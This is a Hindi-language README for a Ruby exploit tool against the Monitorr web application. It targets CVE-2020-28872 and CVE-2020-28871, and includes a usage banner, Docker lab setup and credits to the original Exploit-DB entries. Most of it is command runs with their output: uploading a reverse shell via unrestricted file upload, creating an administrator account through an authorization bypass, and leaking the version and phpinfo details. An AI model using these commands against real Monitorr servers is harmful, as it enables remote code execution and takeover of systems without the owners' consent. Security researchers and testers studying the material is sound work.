
Monitorr के लिए कई एक्सप्लॉइट
CVE-2020-28872 और CVE-2020-28871 के लिए एक्सप्लॉइट।
$ ruby exploit.rb -h
Monitorr-Exploit
Usage:
exploit.rb upload <url> <file> [--debug]
exploit.rb create <url> <user> <pass> <email> [--debug]
exploit.rb version <url> [--debug]
exploit.rb phpinfo <url> [--debug]
exploit.rb -h | --help
upload: Upload a file (RCE via unrestricted file upload)
version: Try to fetch Monitorr version
phpinfo: Extract main phpinfo() information (Information leakage)
create: Create an administrator account (Authorization bypass)
Options:
<url> Root URL (base path) including HTTP scheme, port and root folder
<file> File to be uploaded
--debug Display arguments
-h, --help Show this screen
Examples:
exploit.rb upload http://example.org revshell.php
exploit.rb create https://example.org:8080/monitorr/ noraj password '[email protected]'
exploit.rb version https://example.org:7000/
रिवर्स शेल अपलोड करें:
$ ruby exploit.rb upload http://localhost:7000/ shell.php
[+] File uploaded:
http://localhost:7000//assets/data/usrimg/shell.php
व्यवस्थापक खाता निर्माण:
$ ruby exploit.rb create http://localhost:7000/ noraj20 password '[email protected]'
[+] User created
Username: noraj20
Email: [email protected]
Password: password
Monitorr संस्करण प्राप्त करें:
$ ruby exploit.rb version http://localhost:7000/
1.7.6m
phpinfp() प्राप्त करें:
$ ruby exploit.rb phpinfo http://localhost:7000/
System: Linux f0ded2053dda 5.12.12-zen1-1-zen #1 ZEN SMP PREEMPT Fri, 18 Jun 2021 21:59:24 +0000 x86_64
PHP version: 7.1.17
disable_functions: no value</i>
open_basedir: no value</i>
Full phpinfo() location: http://localhost:7000//assets/php/phpinfo.php
gem का उपयोग करते हुए उदाहरण:
bundle install
# or
gem install httpx docopt
चेतावनी: निश्चित रूप से यह सेटअप उत्पादन उपयोग के लिए उपयुक्त नहीं है!
$ sudo docker-compose up
ऐप को http://127.0.0.1:7000/monitorr/settings.php पर सेटअप / आरंभ करें।
यह EDB-48981 (CVE-2020-28872) और EDB-48980 (CVE-2020-28871) का बेहतर पुनर्लेखन और संलयन है, साथ ही अतिरिक्त कार्यक्षमताएँ हैं।
अपलोड और व्यवस्थापक खाता निर्माण की कमज़ोरियाँ Lyhin's Lab द्वारा पाई गई थीं। phpinfo और Monitorr संस्करण रिसाव Alexandre ZANNI उर्फ noraj द्वारा पाए गए थे।
मूल एक्सप्लॉइट और कमज़ोरी का विश्लेषण: